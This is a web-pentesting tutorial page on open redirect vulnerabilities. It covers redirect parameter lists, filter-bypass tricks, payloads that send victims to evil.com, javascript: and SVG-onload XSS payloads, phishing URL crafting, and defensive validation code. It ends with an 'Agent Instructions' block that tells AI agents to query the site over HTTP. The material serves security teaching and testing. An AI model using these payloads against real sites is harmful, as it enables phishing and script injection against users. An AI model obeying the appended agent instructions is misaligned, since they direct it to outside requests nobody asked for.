# Open Redirect

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses.  📚
  {% endtab %}
  {% endtabs %}

## **Basic info - Open Redirect**

**Open Redirect** (also known as **Unvalidated Redirects and Forwards**) occurs when a web application accepts user-supplied input and redirects the user to an arbitrary URL without proper validation.

{% embed url="<https://www.youtube.com/watch?v=dCfpY64WX9I>" %}

### How to find entry points to test?&#x20;

* Burp Proxy history & Burp Sitemap (look at URLs with parameters)
* Google dorking. E.g: `inurl:redirectUrl=http site:target.com`
* Functionalities usually associated with redirects:
  * Login, Logout, Register & Password reset pages
  * Change site language
  * Links in emails
* Read JavaScript code
* Bruteforcing
  * Look for hidden redirect parameters, for e.g.:
  * `/redirect?url={payload}&next={payload}&redirect={payload}&redir={payload}&rurl={payload}&redirect_uri={payload}`
  * `/?url={payload}&next={payload}&redirect={payload}&redir={payload}&rurl={payload}&redirect_uri={payload}`

### Responses to look for when fuzzing&#x20;

* HTTP redirect status codes
  * [300 Multiple Choices](https://httpstatuses.com/300)
  * [301 Moved Permanently](https://httpstatuses.com/301)
  * [302 Found](https://httpstatuses.com/302)
  * [303 See Other](https://httpstatuses.com/303)
  * [304 Not Modified](https://httpstatuses.com/304)
  * [305 Use Proxy](https://httpstatuses.com/305)
  * [307 Temporary Redirect](https://httpstatuses.com/307)
  * [308 Permanent Redirect](https://httpstatuses.com/308)
* Alert box popping up

***

## Tips&#x20;

* Try using the same parameter twice: `?next=whitelisted.com&next=google.com`
* If periods filtered, use an IPv4 address in decimal notation <http://www.geektools.com/geektools-cgi/ipconv.cgi>
* Try a double-URL and triple-URL encoded version of payloads
* Try redirecting to an IP address (instead of a domain) using [different notations](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf): IPv6, IPv4 in decimal, hex or octal
* For XSS, try replacing alert(1) with prompt(1) & confirm(1)
* If extension checked, try `?image_url={payload}/.jpg`
* Try `target.com/?redirect_url=.uk` (or `[any_param]=.uk`). If it redirects to target.com.uk, then it’s vulnerable! target.com.uk and target.com are different domains.
* Use /U+e280 RIGHT-TO-LEFT OVERRIDE: `https://whitelisted.com@%E2%80%AE@moc.elgoog`
  * The unicode character U+202E changes all subsequent text to be right-to-left
  * E.g.: <https://hackerone.com/reports/299403>

***

## **Identifying Open Redirect Vulnerabilities**

### **Common Parameters to Test**

Many applications use redirection parameters like:

```
/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
success=https://www.verylazytech.com
data=https://www.verylazytech.com
qurl=https://www.verylazytech.com
login=https://www.verylazytech.com
logout=https://www.verylazytech.com
ext=https://www.verylazytech.com
clickurl=https://www.verylazytech.com
goto=https://www.verylazytech.com
rit_url=https://www.verylazytech.com
forward_url=https://www.verylazytech.com
@https://www.verylazytech.com
forward=https://www.verylazytech.com
pic=https://www.verylazytech.com
callback_url=https://www.verylazytech.com
jump=https://www.verylazytech.com
jump_url=https://www.verylazytech.com
click?u=https://www.verylazytech.com
originUrl=https://www.verylazytech.com
origin=https://www.verylazytech.com
Url=https://www.verylazytech.com
desturl=https://www.verylazytech.com
u=https://www.verylazytech.com
page=https://www.verylazytech.com
u1=https://www.verylazytech.com
action=https://www.verylazytech.com
action_url=https://www.verylazytech.com
Redirect=https://www.verylazytech.com
sp_url=https://www.verylazytech.com
service=https://www.verylazytech.com
recurl=https://www.verylazytech.com
j?url=https://www.verylazytech.com
url=//https://www.verylazytech.com
uri=https://www.verylazytech.com
u=https://www.verylazytech.com
allinurl:https://www.verylazytech.com
q=https://www.verylazytech.com
link=https://www.verylazytech.com
src=https://www.verylazytech.com
tc?src=https://www.verylazytech.com
linkAddress=https://www.verylazytech.com
location=https://www.verylazytech.com
burl=https://www.verylazytech.com
request=https://www.verylazytech.com
backurl=https://www.verylazytech.com
RedirectUrl=https://www.verylazytech.com
Redirect=https://www.verylazytech.com
ReturnUrl=https://www.verylazytech.com


```

If these parameters are processed without validation, they might be vulnerable.

### **Passive Detection**

1. **Check URL parameters** – Look for redirect-related keywords in URLs.
2. **Analyze HTTP responses** – Look for **302 Found** or **301 Moved Permanently** responses.
3. **Check developer console (F12) and network traffic** – Inspect redirects.

### **Active Testing (Manual and Automated)**

* **Modify the URL and inject external domains**:

  ```
  https://example.com/login?redirect=https://evil.com
  ```
* **Using Burp Suite's Intruder to fuzz redirection parameters**.
* **Using tools like Oralyzer**:

  ```
  python3 oralyzer.py -u "https://example.com?redirect="
  ```

***

## **Exploiting Open Redirect Vulnerabilities**

### **Basic Open Redirect Exploitation**

If an application blindly trusts user input, you can redirect a victim to a malicious website:

```
https://example.com/login?redirect=http://evil.com
```

or use encoded URLs:

```
https://example.com/login?redirect=%68%74%74%70%3a%2f%2fevil.com
```

### **Redirect to Localhost (Bypass Authentication)**

If an application allows redirection to localhost:

```
https://example.com/login?redirect=http://127.0.0.1
```

It can be used to:

* Redirect an admin panel login to an internal resource.
* Exploit internal APIs (in SSRF attacks).

### **URL Format Bypass**

Some applications attempt to restrict external domains but allow different URL formats:

```
https://example.com/login?redirect=//evil.com
https://example.com/login?redirect=//evil.com@trusted.com
```

* `//evil.com` is a shorthand for `https://evil.com`.
* `@trusted.com` is ignored by some browsers.

***

## **Open Redirect to XSS**

Some browsers allow **JavaScript-based redirects** if improperly filtered.

### **Basic Payloads**

```javascript
javascript:alert(1)
```

or bypassing `javascript` filters:

```javascript
java%0d%0ascript%0d%0a:alert(0)
```

### **Using Comments and Encoding**

```javascript
javascript://sub.domain.com/%0Aalert(1)
javascript://%250Aalert(1)
javascript://%250A1?alert(1):0
```

### **SVG File Exploit (Open Redirect via File Upload)**

Some applications allow uploading **SVG files** that can trigger JavaScript execution:

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg onload="window.location='http://evil.com'" xmlns="http://www.w3.org/2000/svg">
</svg>
```

If the website automatically loads SVG files, the redirection will be triggered.

***

## **Exploiting Open Redirect for Phishing**

Attackers can craft **realistic-looking URLs** to trick users:

```
https://bank.com?redirect=https://bank.com.evil.com
```

Users might not notice the difference and enter their credentials.

***

## **Tools for Automating Open Redirect Testing**

### **Oralyzer (Automated Open Redirect Scanner)**

* GitHub: <https://github.com/0xNanda/Oralyzer>
* Run the tool:

  ```bash
  python3 oralyzer.py -u "https://example.com?redirect="
  ```

### **Fuzzing with Payload Lists**

* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect)

***

## **Defense Against Open Redirects**

### **Input Validation**

* Only allow **whitelisted domains** for redirection:

  ```python
  allowed_domains = ["mysafedomain.com"]
  if parsed_url.netloc not in allowed_domains:
      return "Invalid redirect URL"
  ```

### **Use Relative URLs Instead of Absolute**

Instead of:

```php
header("Location: ".$_GET['redirect']);
```

Use:

```php
header("Location: /dashboard");
```

### **URL Sanitization**

Ensure the redirect URL starts with a trusted domain:

```php
if (!preg_match("/^https:\/\/mysafedomain\.com/", $_GET['redirect'])) {
    die("Invalid redirect URL");
}
```

***

## Code examples <a href="#code-examples" id="code-examples"></a>

**.Net**

```bash
response.redirect("~/mysafe-subdomain/login.aspx")
```

**Java**

```bash
response.redirect("http://www.verylazytech.com");
```

**PHP**

```php
<?php
/* browser redirections*/
header("Location: http://www.verylazytech.com");
exit;
?>
```

***

{% hint style="success" %}
Learn & practice [**For the OSCP.**](https://shop.verylazytech.com)

<details>

<summary>Support VeryLazyTech 🎉</summary>

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses.  📚

</details>
{% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.verylazytech.com/pentesting-web/open-redirect.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.